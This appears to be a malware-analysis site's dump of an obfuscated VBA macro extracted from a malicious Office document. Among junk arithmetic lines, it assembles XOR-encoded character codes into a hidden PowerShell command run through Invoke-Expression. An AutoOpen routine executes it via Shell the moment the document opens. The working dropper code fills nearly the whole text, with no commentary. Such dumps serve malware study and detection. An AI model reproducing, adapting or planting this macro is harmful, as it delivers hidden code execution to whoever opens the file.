rHiGIQ = CByte(60890 * Tan(86322) / 25216 + CLng(DOUjN * 52260 * 53015 * Chr(5195)))
jRJMv = (52777 / CBool(50774) + 31731 + CSng(DAApza) * (41702 - WkTZN + 92000 - CLng(sEAPST)))
ldCjOEPZG = "7F4" + "3}67F" + "100" + "S1" + "13c98" + "E100S61" + "c6" + "4S98F12" + "7}115U" + "117V99" + "F99U48" + "U52"
YMoqno = CByte(65183 * Tan(99982) / 74329 + CLng(iLCmwF * 95337 * 23086 * Chr(43735)))
dICZiT = (42535 / CBool(65132) + 38271 + CSng(aKzQIJ) * (87542 - rREbd + 45397 - CLng(Wzbui)))
pCmfVMb = "%86U" + "97F83F" + "43E" + "114c98%1" + "17c1" + "13" + "S123}43" + "}1" + "09E11"
PYKNo = CByte(52618 * Tan(30014) / 76885 + CLng(JUrSs * 91858 * 43782 * Chr(78896)))
QklZC = (59284 / CBool(59273) + 24848 + CSng(UunoN) * (3935 - JaUVLK + 8699 - CLng(WPblQQ)))
KoYNta = "5c113@" + "100@115" + "F120c107" + "}10" + "9q10" + "9'.sPLiT" + Chr(40) + "'%q"
tmBSTi = CByte(46978 * Tan(43195) / 3693 + CLng(IUMBF * 31605 * 46609 * Chr(98585)))
wwWrBI = (10638 / CBool(61301) + 13074 + CSng(mDtws) * (36258 - PizNWt + 74533 - CLng(LqTmm)))
jiIbMGYZUG = "F@EcU}" + "VS' " + Chr(41) + " |" + " foRe" + "acH-oB" + "jeCT{[" + "char] " + Chr(40) + "$" + "_ -bxO" + "r '0" + "x10" + "'" + Chr(41) + " } "
UmYtA = CByte(94641 * Tan(59158) / 81974 + CLng(utjjV * 28815 * 106 * Chr(69186)))
NjspWb = (5952 / CBool(69393) + 60154 + CSng(SmtUct) * (32493 - iYoGsc + 84619 - CLng(CjlGu)))
vpkuCkFPVqP = Chr(41) + " " + Chr(41) + "|iEX" + ""
jnqPwYQfh = FnYVvi + ZwoQac + ldCjOEPZG + pCmfVMb + KoYNta + jiIbMGYZUG + vpkuCkFPVqP
CzcSWY = CByte(87573 * Tan(52887) / 32440 + CLng(kzNRu * 91642 * 39827 * Chr(71228)))
oYtaL = (14701 / CBool(77039) + 30534 + CSng(RZWwYv) * (99246 - GwjsT + 25503 - CLng(ItMMsW)))
End Function


Attribute VB_Name = "XHAKiETCAO"
Function TNIBLouI()
On Error Resume Next
NUHEh = CByte(14698 * Tan(54325) / 27658 + CLng(dBHzt * 18615 * 8731 * Chr(55810)))
izbNj = (57439 / CBool(3250) + 12489 + CSng(WOlLfk) * (10500 - dntrjX + 6487 - CLng(CPzwar)))
MpjbZZwnG = woPsi + Chr(zYvsYOot + 80 + tsQXJ) + "ow" + "ers"
UJarb = CByte(14378 * Tan(80523) / 12240 + CLng(IszAHT * 67328 * 55013 * Chr(78623)))
AAcFiB = (52990 / CBool(47268) + 28224 + CSng(NEKSiK) * (47246 - XfXTBZ + 64694 - CLng(fPDFt)))
wnPkai = CByte(43831 * Tan(90231) / 85587 + CLng(YjYkRo * 68134 * 29030 * Chr(96177)))
SjzOh = (97573 / CBool(5636) + 46116 + CSng(WLUJj) * (4753 - AsnjRB + 33462 - CLng(PaCYZ)))
TNIBLouI = bQMiADT + MpjbZZwnG + VmrcQjX + nAOuBcziUnQ + kVVkXhlRKo + jnqPwYQfh
naBaFw = CByte(17918 * Tan(63060) / 17411 + CLng(bvlwu * 71782 * 2298 * Chr(20313)))
TqpFD = (33769 / CBool(29580) + 90829 + CSng(HwdwXZ) * (46621 - ZJXNF + 99386 - CLng(Khchka)))
End Function
Function LJcOkRkD(ZYLQwQK)
On Error Resume Next
wbWrs = CByte(62287 * Tan(64509) / 1463 + CLng(NOEOKT * 63602 * 33172 * Chr(43536)))
iKFaKN = (82968 / CBool(88918) + 90665 + CSng(piKYQ) * (17344 - wwUZw + 85250 - CLng(IlKOw)))
jbUnuL = CByte(47321 * Tan(13952) / 43816 + CLng(YFOcjR * 20161 * 73003 * Chr(15921)))
nrpEq = (37024 / CBool(74173) + 34580 + CSng(RZCcv) * (59678 - NLSjk + 52835 - CLng(FjFVi)))
JiZjv = jwzEcSpXq + zBdzCkwQuwi + Shell(MQwuMALr + ZYLQwQK + fUOhNwzKGpJ, (14842 / 14842) - 1)
TNwwa = CByte(11511 * Tan(41626) / 95667 + CLng(zjXBu * 52165 * 1846 * Chr(57691)))
lGVwpk = (22846 / CBool(79346) + 68699 + CSng(lzEkZ) * (81129 - PikGS + 82633 - CLng(ubVzTn)))
End Function
Sub AutoOpen()
On Error Resume Next
Tarwaa = CByte(56732 * Tan(30590) / 80795 + CLng(iKQRi * 92409 * 74603 * Chr(25456)))
sMvDX = (55216 / CBool(35580) + 29374 + CSng(EOOMWw) * (93382 - jFnzk + 68064 - CLng(YlXup)))
LJcOkRkD (TNIBLouI)
JTkHbi = CByte(3411 * Tan(86448) / 33699 + CLng(zkDQGk * 20361 * 60922 * Chr(89096)))
EdrvqD = (16757 / CBool(56266) + 57218 + CSng(mFXZFl) * (78087 - PvVTB + 87844 - CLng(JoUSic)))
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.